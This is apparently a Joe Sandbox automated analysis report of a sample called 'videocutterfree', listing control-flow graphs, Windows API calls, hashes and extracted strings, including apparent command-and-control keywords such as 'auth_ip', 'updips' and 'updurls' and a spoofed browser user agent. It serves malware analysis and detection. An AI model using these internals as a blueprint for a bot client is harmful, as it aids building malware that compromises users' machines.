891->869 891->882 894->862 894->891 897->829 898->831 911 99667b-99667d 899->911 912 99698c-99699b call 9a10ec 899->912 900->831 900->850 911->912 913 996683-99669c call 99439c 911->913 912->831 922 9969a1-9969cd call 9a1d5c call 9a38a0 call 99439c 912->922 913->831 923 9966a2-996770 call 9a11c8 call 991ba7 913->923 944 9969cf-9969d1 call 99534d 922->944 945 9969d6-9969dd call 9a1d24 922->945 941 996772 call 99143f 923->941 942 996777-996798 RtlEnterCriticalSection 923->942 946 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 938->946 939->938 943 996404-996416 call 9a10ec 939->943 941->942 948 99679a-9967a1 942->948 949 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 942->949 943->938 959 996418-996439 call 99439c 943->959 944->945 945->831 972 99646f-99647e call 9a2396 946->972 973 9964ae-9964b7 call 9a1d24 946->973 948->949 970 996811-996853 call 9994d4 949->970 971 996973-996987 call 997db2 949->971 959->946 983 996859-996860 970->983 984 99693d-99696e call 997199 call 9933b2 970->984 971->831 972->973 982 996480 972->982 985 9964bd-9964d5 call 9a28fc 973->985 986 9965dc-9965e9 973->986 987 996485-996497 call 9a1600 982->987 989 996863-996868 983->989 984->971 995 9964e1 985->995 996 9964d7-9964df call 9984e6 985->996 986->831 1002 996499 987->1002 1003 99649c-9964ac call 9a2396 987->1003 989->989 993 99686a-9968af call 9994d4 989->993 993->984 1008 9968b5-9968bb 993->1008 1001 9964e3-996589 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 995->1001 996->1001 1028 99658b call 99380b 1001->1028 1029 996590-9965bb Sleep call 9a06a0 1001->1029 1002->1003 1003->973 1003->987 1011 9968be-9968c3 1008->1011 1011->1011 1013 9968c5-996900 call 9994d4 1011->1013 1013->984 1018 996902-99693c call 99bec6 1013->1018 1018->984 1028->1029 1033 9965bd-9965c6 call 994100 1029->1033 1034 9965c7-9965d5 1029->1034 1033->1034 1034->986 1036 9965d7 call 99380b 1034->1036 1036->986
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset$CriticalSection$EnterLeave_malloc_strtok$Sleep_free_swscanf
                                                                              • String ID: "gk$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                              • API String ID: 3973504402-1155504658
                                                                              • Opcode ID: 63ac1c79d5ffec96fa5e9d5424e21ab51b9bea5e4ed840c455200a20b890c4a9
                                                                              • Instruction ID: 3445c01b6084af545b123fde3d8d73f3a6146ee49741d9a31b655eec7f769db0
                                                                              • Opcode Fuzzy Hash: 63ac1c79d5ffec96fa5e9d5424e21ab51b9bea5e4ed840c455200a20b890c4a9
                                                                              • Instruction Fuzzy Hash: E9B1A97164C3409BDF25ABBC9D02BAF7BE89FD6724F14042DF594972E2DA21E800C792

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1039 991cf8-991d21 CreateEventA 1040 991d23-991d4e GetLastError call 99f8c0 call 991712 1039->1040 1041 991d52-991d69 CreateEventA 1039->1041 1040->1041 1042 991d6b-991d96 GetLastError call 99f8c0 call 991712 1041->1042 1043 991d9a-991db1 call 9a2169 1041->1043 1042->1043 1046 991db6-991dc4 1043->1046 1049 991e0d-991e0f 1046->1049 1050 991dc6-991dda GetLastError 1046->1050 1054 991e1d-991e23 1049->1054 1055 991e11-991e1b WaitForSingleObject CloseHandle 1049->1055 1061 991ddc-991ddd CloseHandle 1050->1061 1062 991ddf-991de7 1050->1062 1055->1054 1061->1062 1063 991de9-991dec CloseHandle 1062->1063 1064 991dee-991e08 call 99f8c0 call 991712 1062->1064 1063->1064 1064->1049
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00991D11
                                                                              • GetLastError.KERNEL32 ref: 00991D23
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00991D59
                                                                              • GetLastError.KERNEL32 ref: 00991D6B
                                                                              • __beginthreadex.LIBCMT ref: 00991DB1
                                                                              • GetLastError.KERNEL32 ref: 00991DC6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00991DDD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00991DEC
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00991E14
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00991E1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                              • String ID: thread$thread.entry_event$thread.exit_event
                                                                              • API String ID: 831262434-3017686385
                                                                              • Opcode ID: 0c65bf8851f6b446373833ef66ce583a4e79b5b28841cca8c0cfef3bd04dc641
                                                                              • Instruction ID: c65b8e9ef8596fa1f78b29517191a5868585e37725d6a412e590a1dd67834591
                                                                              • Opcode Fuzzy Hash: 0c65bf8851f6b446373833ef66ce583a4e79b5b28841cca8c0cfef3bd04dc641
                                                                              • Instruction Fuzzy Hash: A4318F719043029FDB00EF29C848B2BBBE8FB84760F10492DF955C72A1DB709C49CB92

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1068 994d86-994dcb call 9b41a0 call 99f8c0 RtlEnterCriticalSection RtlLeaveCriticalSection 1073 994dd1 1068->1073 1074 9950d4-9950dd 1068->1074 1077 994dd6-994df6 call 993863 call 994bed 1073->1077 1075 9950df call 99380b 1074->1075 1076 9950e4-9950f4 1074->1076 1075->1076 1082 994dfb-994e00 1077->1082 1083 9950a1-9950ad RtlEnterCriticalSection RtlLeaveCriticalSection 1082->1083 1084 994e06-994e0b 1082->1084 1087 9950b3-9950ce RtlEnterCriticalSection RtlLeaveCriticalSection 1083->1087 1085 99506e-995070 1084->1085 1086 994e11-994e3a call 99bc88 1084->1086 1085->1083 1089 995072-99509f call 9994d4 1085->1089 1086->1083 1092 994e40-994e5c call 996ad3 1086->1092 1087->1074 1087->1077 1089->1083 1089->1087 1096 994e5e-994e87 call 99bc88 1092->1096 1097 994ec4-994ec8 1092->1097 1099 994e8d-994e99 RtlEnterCriticalSection RtlLeaveCriticalSection 1096->1099 1105 994f98-994fc1 call 99bc88 1096->1105 1098 994eca-994ef9 call 99bc88 1097->1098 1097->1099 1098->1099 1108 994efb-994f2c call 99bc88 1098->1108 1103 994e9f-994ea6 RtlEnterCriticalSection RtlLeaveCriticalSection 1099->1103 1106 994eac-994ebf call 99773b 1103->1106 1113 995064-995069 1105->1113 1114 994fc7-994ff0 call 99bc88 1105->1114 1106->1087 1108->1099 1117 994f32-994f93 call 99bdba call 99773b call 9974b0 call 99773b 1108->1117 1113->1103 1114->1113 1120 994ff2-995050 call 996aad call 999761 call 999839 call 99773b call 9a06a0 1114->1120 1117->1105 1120->1106 1137 995056-99505f call 994100 1120->1137 1137->1106
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994D8B
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00994DB7
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00994DC3
                                                                                • Part of subcall function 00994BED: __EH_prolog.LIBCMT ref: 00994BF2
                                                                                • Part of subcall function 00994BED: InterlockedExchange.KERNEL32(?,00000000), ref: 00994CF2
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00994E93
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00994E99
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00994EA0
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00994EA6
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 009950A7
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 009950AD
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 009950B8
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 009950C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2062355503-0
                                                                              • Opcode ID: 937e9fd4707467542967eac08f92b373a5994733083be99dee2f49c3c0955caf
                                                                              • Instruction ID: a5a59e01123ca876400efa3ba77588e6687c0d7b4e88abf4106f140522bfd560
                                                                              • Opcode Fuzzy Hash: 937e9fd4707467542967eac08f92b373a5994733083be99dee2f49c3c0955caf
                                                                              • Instruction Fuzzy Hash: 1AB1AE31D0421DDFEF21DFA8D840BEEBBB8AF44314F10415AE40476281DB786A89CFA2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1166 40290d-402912 1167 402914-40291d 1166->1167 1168 402979-402983 RegSetValueExA 1166->1168 1169 40b694-40b69b 1167->1169 1170 40baff RegCloseKey 1168->1170 1169->1170 1171 40b665-40b673 1169->1171 1172 40bb05 1170->1172 1171->1169 1172->1172
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValue
                                                                              • String ID: -Pat$KCU:$h "H$rope$rty
                                                                              • API String ID: 3132538880-2216428058
                                                                              • Opcode ID: 82c1ec06655e9e16720288c49c00243484a3c03b613a039afd8d34543cb8d91c
                                                                              • Instruction ID: 9adcfc74a9bdc4fe4e00f5127b96b60a39d9cb5ff0fd7c0e9d3230681216cd64
                                                                              • Opcode Fuzzy Hash: 82c1ec06655e9e16720288c49c00243484a3c03b613a039afd8d34543cb8d91c
                                                                              • Instruction Fuzzy Hash: 90E04FB0004B06CFC6308F59D24846ABEF5FB20301B214E2E909375AA0C33A6756DF9F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1173 401f64-401f84 FindResourceA 1174 401f86-401f9d GetLastError SizeofResource 1173->1174 1175 401f9f-401fa1 1173->1175 1174->1175 1176 401fa6-401fec LoadResource LockResource GlobalAlloc call 4029f0 * 2 1174->1176 1177 402096-40209a 1175->1177 1182 401fee-401ff9 1176->1182 1182->1182 1183 401ffb-402003 GetTickCount 1182->1183 1184 402032-402038 1183->1184 1185 402005-402007 1183->1185 1186 402053-402083 GlobalAlloc call 401c26 1184->1186 1188 40203a-40204a 1184->1188 1185->1186 1187 402009-40200f 1185->1187 1195 402088-402093 1186->1195 1187->1186 1189 402011-402023 1187->1189 1190 40204c 1188->1190 1191 40204e-402051 1188->1191 1193 402025 1189->1193 1194 402027-40202a 1189->1194 1190->1191 1191->1186 1191->1188 1193->1194 1194->1189 1196 40202c-40202e 1194->1196 1195->1177 1196->1187 1197 402030 1196->1197 1197->1186
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                              • GetLastError.KERNEL32 ref: 00401F86
                                                                              • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                              • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                              • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                              • GetTickCount.KERNEL32 ref: 00401FFB
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                              • String ID:
                                                                              • API String ID: 564119183-0
                                                                              • Opcode ID: 8e9bcc6dc49fd93e7a343c7af07671cdd5b35766865ffdda6a5b1d9fb7f8855a
                                                                              • Instruction ID: 3a1fb460451ce701fd6595fbba3645315e1b12efc03cc812e7124109c54b77f4
                                                                              • Opcode Fuzzy Hash: 8e9bcc6dc49fd93e7a343c7af07671cdd5b35766865ffdda6a5b1d9fb7f8855a
                                                                              • Instruction Fuzzy Hash: D0313B71A40251AFDB109FB99E489AF7B78EF45344F10807AFA46F7281D6748841D7A8

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1198 9926db-992726 RtlEnterCriticalSection 1199 992728-992736 CreateWaitableTimerA 1198->1199 1200 99277e-992781 1198->1200 1201 992738-992756 GetLastError call 99f8c0 call 991712 1199->1201 1202 99275b-992778 SetWaitableTimer 1199->1202 1203 992783-992798 call 9a28fc 1200->1203 1204 9927d5-9927f0 RtlLeaveCriticalSection 1200->1204 1201->1202 1202->1200 1210 9927ca 1203->1210 1211 99279a-9927ac call 9a28fc 1203->1211 1212 9927cc-9927d0 call 996bb2 1210->1212 1216 9927b9 1211->1216 1217 9927ae-9927b7 1211->1217 1212->1204 1218 9927bb-9927c3 call 991cf8 1216->1218 1217->1218 1220 9927c8 1218->1220 1220->1212
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00992706
                                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0099272B
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B4903), ref: 00992738
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 00992778
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 009927D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID: timer
                                                                              • API String ID: 4293676635-1792073242
                                                                              • Opcode ID: f5b32ebba3cfa53980384af27d3c4ecca1bf9ec0a40ba79c72c718e71abbda45
                                                                              • Instruction ID: 89ac3a2fc324e175b70f78ec1c1e0d450fa6986f7ea7868635e6069e0fd6862a
                                                                              • Opcode Fuzzy Hash: f5b32ebba3cfa53980384af27d3c4ecca1bf9ec0a40ba79c72c718e71abbda45
                                                                              • Instruction Fuzzy Hash: 3431B0B1508706EFD710DF6AD944B6ABBE8FB88B24F004A2EF85593680D774E900CF91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1249 996a0a-996a25 1250 996a26-996a27 1249->1250 1251 9969b9-9969c4 1250->1251 1252 996a29 1250->1252 1255 9969ca-9969cd 1251->1255 1256 9969c5 call 99439c 1251->1256 1253 996a2b-996a2e 1252->1253 1254 996a65-996a70 1252->1254 1253->1254 1259 996adb-996ae7 1254->1259 1260 996a72 1254->1260 1257 9969cf-9969d1 call 99534d 1255->1257 1258 9969d6-9969dd call 9a1d24 1255->1258 1256->1255 1257->1258 1268 995f08-995f0a 1258->1268 1264 996aef-996aff call 997e61 1259->1264 1265 996aea call 991370 1259->1265 1260->1250 1263 996a74-996a79 1260->1263 1263->1259 1265->1264 1270 995f0c-995f11 1268->1270 1271 995f13-995f15 1268->1271 1272 995f1c Sleep 1270->1272 1273 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 1271->1273 1274 995f17 1271->1274 1272->1273 1275 996029-996035 1273->1275 1274->1272 1276 996048 1275->1276 1277 99604a-996052 1276->1277 1278 9960c4-9960cb 1276->1278 1277->1275 1280 996054-99607e 1277->1280 1279 9960cc-9960cf 1278->1279 1281 9960d1-9960ed 1279->1281 1282 9960c3 1279->1282 1280->1276 1286 996090-996094 1280->1286 1284 9960ab 1281->1284 1285 9960ef-9960f0 1281->1285 1282->1278 1290 9960b0-9960bd 1284->1290 1287 9960f3-99610c 1285->1287 1288 9960a3-9960a9 1286->1288 1289 996096 1286->1289 1291 99610e 1287->1291 1292 9960c0-9960c2 1287->1292 1288->1284 1289->1290 1290->1286 1293 9960bf 1290->1293 1294 996151-996193 1291->1294 1295 996110-996130 1291->1295 1292->1282 1292->1287 1293->1279 1293->1292 1297 996194-99619f 1294->1297 1296 996145-99614e 1295->1296 1298 996150 1296->1298 1299 9961a1-9961a4 1297->1299 1300 9961e0-9961e5 1297->1300 1298->1294 1299->1296 1303 9961a6 1299->1303 1301 996212-996217 1300->1301 1302 9961e6-9961ec 1300->1302 1306 996218-996228 1301->1306 1307 9961a7-9961c1 1301->1307 1304 99622f-996233 1302->1304 1305 9961ee 1302->1305 1303->1298 1303->1307 1308 9961f0-9961f6 1304->1308 1309 996235-996236 1304->1309 1305->1308 1310 9961cb-9961dc 1306->1310 1316 99622b 1306->1316 1307->1310 1311 9961f7-9961fb 1308->1311 1313 996238-99623b 1309->1313 1314 9962aa-9962b2 call 99439c 1309->1314 1310->1300 1311->1297 1315 9961fd-9961ff 1311->1315 1313->1311 1318 99623d-996256 1313->1318 1314->1268 1324 9962b8-9962e3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 1314->1324 1319 996258-996262 1315->1319 1320 996201-99620e 1315->1320 1316->1304 1318->1319 1322 99627e-996288 1319->1322 1323 996264-99626a 1319->1323 1320->1301 1322->1268 1327 99628e-9962a9 call 9a38a0 1322->1327 1325 99626c-99626e 1323->1325 1326 996270-99627d call 9953ec 1323->1326 1334 99632d-996345 call 9a10ec 1324->1334 1335 9962e5-9962f4 call 9a10ec 1324->1335 1325->1322 1326->1322 1327->1314 1341 99634b-99634d 1334->1341 1342 9965ee-9965fd call 9a10ec 1334->1342 1335->1334 1340 9962f6-996305 call 9a10ec 1335->1340 1340->1334 1352 996307-996316 call 9a10ec 1340->1352 1341->1342 1345 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 1341->1345 1349 9965ff-996601 1342->1349 1350 996642-996651 call 9a10ec 1342->1350 1403 99643b 1345->1403 1404 996400-996402 1345->1404 1349->1350 1353 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 1349->1353 1363 996653-996661 call 995a29 call 995b37 1350->1363 1364 996666-996675 call 9a10ec 1350->1364 1352->1334 1365 996318-996327 call 9a10ec 1352->1365 1353->1268 1363->1268 1376 99667b-99667d 1364->1376 1377 99698c-99699b call 9a10ec 1364->1377 1365->1268 1365->1334 1376->1377 1378 996683-99669c call 99439c 1376->1378 1377->1268 1387 9969a1-9969c5 call 9a1d5c call 9a38a0 call 99439c 1377->1387 1378->1268 1388 9966a2-996770 call 9a11c8 call 991ba7 1378->1388 1387->1255 1405 996772 call 99143f 1388->1405 1406 996777-996798 RtlEnterCriticalSection 1388->1406 1408 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 1403->1408 1404->1403 1407 996404-996416 call 9a10ec 1404->1407 1405->1406 1410 99679a-9967a1 1406->1410 1411 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 1406->1411 1407->1403 1418 996418-996439 call 99439c 1407->1418 1431 99646f-99647e call 9a2396 1408->1431 1432 9964ae-9964b7 call 9a1d24 1408->1432 1410->1411 1429 996811-996853 call 9994d4 1411->1429 1430 996973-996987 call 997db2 1411->1430 1418->1408 1442 996859-996860 1429->1442 1443 99693d-99696e call 997199 call 9933b2 1429->1443 1430->1268 1431->1432 1441 996480 1431->1441 1444 9964bd-9964d5 call 9a28fc 1432->1444 1445 9965dc-9965e9 1432->1445 1446 996485-996497 call 9a1600 1441->1446 1448 996863-996868 1442->1448 1443->1430 1454 9964e1 1444->1454 1455 9964d7-9964df call 9984e6 1444->1455 1445->1268 1461 996499 1446->1461 1462 99649c-9964ac call 9a2396 1446->1462 1448->1448 1452 99686a-9968af call 9994d4 1448->1452 1452->1443 1467 9968b5-9968bb 1452->1467 1460 9964e3-996589 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 1454->1460 1455->1460 1487 99658b call 99380b 1460->1487 1488 996590-9965bb Sleep call 9a06a0 1460->1488 1461->1462 1462->1432 1462->1446 1470 9968be-9968c3 1467->1470 1470->1470 1472 9968c5-996900 call 9994d4 1470->1472 1472->1443 1477 996902-99693c call 99bec6 1472->1477 1477->1443 1487->1488 1492 9965bd-9965c6 call 994100 1488->1492 1493 9965c7-9965d5 1488->1493 1492->1493 1493->1445 1495 9965d7 call 99380b 1493->1495 1495->1445
                                                                              APIs
                                                                              • Sleep.KERNEL32(0000EA60), ref: 00995F1C
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00995F27
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00995F38
                                                                              • _free.LIBCMT ref: 009969D7
                                                                              Strings
                                                                              • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 00995F41
                                                                              • urls, xrefs: 009969BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveSleep_free
                                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                                              • API String ID: 2653569029-4235545730
                                                                              • Opcode ID: cad521f5d3e1f76941c80b92891298ff26519f14259796ca214f001d67de1802
                                                                              • Instruction ID: b205e0e0dbe252d8d509284d7aedfe7d4c6ea4741f744afead7ea137a981bb24
                                                                              • Opcode Fuzzy Hash: cad521f5d3e1f76941c80b92891298ff26519f14259796ca214f001d67de1802
                                                                              • Instruction Fuzzy Hash: F0118C33109750DFDF16AB6CAA167D97B60AF93331F14012DF9806B2C2DBA0694197D2
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00991BAC
                                                                              • RtlEnterCriticalSection.NTDLL ref: 00991BBC
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 00991BEA
                                                                              • RtlEnterCriticalSection.NTDLL ref: 00991C13
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 00991C56
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                                              • String ID:
                                                                              • API String ID: 1633115879-0
                                                                              • Opcode ID: 1da54ec9de823a6785334f65df1c4164570f51278149be8f249de8320be42aff
                                                                              • Instruction ID: b60074f9b3748482f388bde01d1ff5188bb2c1f85b88f35ce061d7a056b155fd
                                                                              • Opcode Fuzzy Hash: 1da54ec9de823a6785334f65df1c4164570f51278149be8f249de8320be42aff
                                                                              • Instruction Fuzzy Hash: 1B21CA75A04205AFDF10CF69D9487AABBB9FF98320F108249E84997301D774E901CBA0
                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 00402F76
                                                                                • Part of subcall function 00403BE0: HeapCreate.KERNEL32(00000000,00001000,00000000,00402FAF,00000000), ref: 00403BF1
                                                                                • Part of subcall function 00403BE0: HeapDestroy.KERNEL32 ref: 00403C30
                                                                              • GetCommandLineA.KERNEL32 ref: 00402FC4
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00402FEF
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403012
                                                                                • Part of subcall function 0040306B: ExitProcess.KERNEL32 ref: 00403088
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                              • String ID:
                                                                              • API String ID: 2057626494-0
                                                                              • Opcode ID: 09077eee246ddcd8b2e0dd107b59bb944e82739da1ca5349e50b106b1cc13c78
                                                                              • Instruction ID: 5e6fceb08318beff9a0e0c4b766463963881b01a1b6dc13febf8dd95f986b539
                                                                              • Opcode Fuzzy Hash: 09077eee246ddcd8b2e0dd107b59bb944e82739da1ca5349e50b106b1cc13c78
                                                                              • Instruction Fuzzy Hash: 6D213DB1840715ABD708AFA69D09A6E7FA8EF04705F10413EF905BB2D1DB394A109669
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992EEE
                                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00992EFD
                                                                              • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00992F0C
                                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00992F36
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Socketsetsockopt
                                                                              • String ID:
                                                                              • API String ID: 2093263913-0
                                                                              • Opcode ID: a9f7532349bcb5def8da1356fdc779d53155f984321ca8c1a72c289e44559dfa
                                                                              • Instruction ID: 9583f0d141243905c77f813d366b0cf92120d5a622a58c80dc0df49d2e311f4e
                                                                              • Opcode Fuzzy Hash: a9f7532349bcb5def8da1356fdc779d53155f984321ca8c1a72c289e44559dfa
                                                                              • Instruction Fuzzy Hash: BB01D872510204BBDF205F6ACC48B9ABBBCDB85771F008566F918CB151C67488008770
                                                                              APIs
                                                                                • Part of subcall function 00992D39: WSASetLastError.WS2_32(00000000), ref: 00992D47
                                                                                • Part of subcall function 00992D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00992D5C
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992E6D
                                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 00992E83
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Sendselect
                                                                              • String ID: 3'
                                                                              • API String ID: 2958345159-280543908
                                                                              • Opcode ID: e86433b63a5905aa96d5a358192fef1d6624581e3b6910495e3c81b1f07b84ed
                                                                              • Instruction ID: 9cf14c0d1a91f9f392ab1ef8c0c8ddcc369628c538c9ca86b9498e4bae8cb213
                                                                              • Opcode Fuzzy Hash: e86433b63a5905aa96d5a358192fef1d6624581e3b6910495e3c81b1f07b84ed
                                                                              • Instruction Fuzzy Hash: 0E3104B1E10209AFEF00DFADC8557EEBBF8EF44354F00456AE805D7281E77599448BA0
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992AEA
                                                                              • connect.WS2_32(?,?,?), ref: 00992AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastconnect
                                                                              • String ID: 3'
                                                                              • API String ID: 374722065-280543908
                                                                              • Opcode ID: 362507cdea3c59e5e26117a5169c73cb1c5d87df6245f0c2e6d9d49324ef9da2
